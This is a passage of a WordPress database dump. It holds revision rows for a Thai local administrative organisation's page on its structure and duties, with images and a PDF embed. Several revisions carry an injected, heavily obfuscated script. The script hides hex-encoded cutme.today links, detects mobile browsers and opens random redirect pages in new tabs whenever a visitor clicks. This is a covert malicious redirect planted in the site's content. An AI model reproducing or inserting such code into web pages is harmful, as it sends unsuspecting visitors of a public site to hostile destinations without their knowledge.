_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','โครงสร้างและอำนาจหน้าที่','','inherit','closed','closed','','546-revision-v1','','','2025-05-23 15:59:20','2025-05-23 08:59:20','',546,'http://pakhaeng.ssk.in.th/?p=1282',0,'revision','',0),
(1283,1,'2025-05-23 15:59:43','2025-05-23 08:59:43','<!-- wp:image {\"id\":1280,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้าง-1-1024x256.png\" alt=\"\" class=\"wp-image-1280\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1271,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ปกโครงสร้างและอำนาจหน้าที่\"></object><a id=\"wp-block-file--media-219adcf6-6d31-4699-a835-46b4fa55c26b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf\">ปกโครงสร้างและอำนาจหน้าที่</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-219adcf6-6d31-4699-a835-46b4fa55c26b\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":589,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/โครงสร้างบุคลากร-1.png\" alt=\"\" class=\"wp-image-589\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','โครงสร้างและอำนาจหน้าที่','','inherit','closed','closed','','546-revision-v1','','','2025-05-23 15:59:43','2025-05-23 08:59:43','',546,'http://pakhaeng.ssk.in.th/?p=1283',0,'revision','',0),
(1284,1,'2025-05-23 16:03:45','2025-05-23 09:03:45','','โครงสร้างและอำนาจหน้าที่','','inherit','','closed','','%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%b2%e0%b8%88%e0%b8%ab%e0%b8%99%e0%b9%89%e0%b8%b2%e0%b8%97','','','2025-05-23 16:03:45','2025-05-23 09:03:45','',546,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้างและอำนาจหน้าที่.pdf',0,'attachment','application/pdf',0),
(1285,1,'2025-05-23 16:03:50','2025-05-23 09:03:50','<!-- wp:image {\"id\":1280,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้าง-1-1024x256.png\" alt=\"\" class=\"wp-image-1280\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1284,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้างและอำนาจหน้าที่.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้างและอำนาจหน้าที่.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"โครงสร้างและอำนาจหน้าที่\"></object><a id=\"wp-block-file--media-18759cf2-e68c-45aa-8b1a-07e5eddca924\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้างและอำนาจหน้าที่.pdf\">โครงสร้างและอำนาจหน้าที่</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้างและอำนาจหน้าที่.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-18759cf2-e68c-45aa-8b1a-07e5eddca924\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":589,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/โครงสร้างบุคลากร-1.png\" alt=\"\" class=\"wp-image-589\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','โครงสร้างและอำนาจหน้าที่','','inherit','closed','closed','','546-revision-v1','','','2025-05-23 16:03:50','2025-05-23 09:03:50','',546,'http://pakhaeng.ssk.in.th/?p=1285',0,'revision','',0),
(1286,1,'2025-05-23 16:03:53','2025-05-23 09:03:53','<!-- wp:image {\"id\":1280,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้าง-1-1024x256.png\" alt=\"\" class=\"wp-image-1280\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1284,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้างและอำนาจหน้าที่.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้างและอำนาจหน้าที่.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"โครงสร้างและอำนาจหน้าที่\"></object><a id=\"wp-block-file--media-18759cf2-e68c-45aa-8b1a-07e5eddca924\" 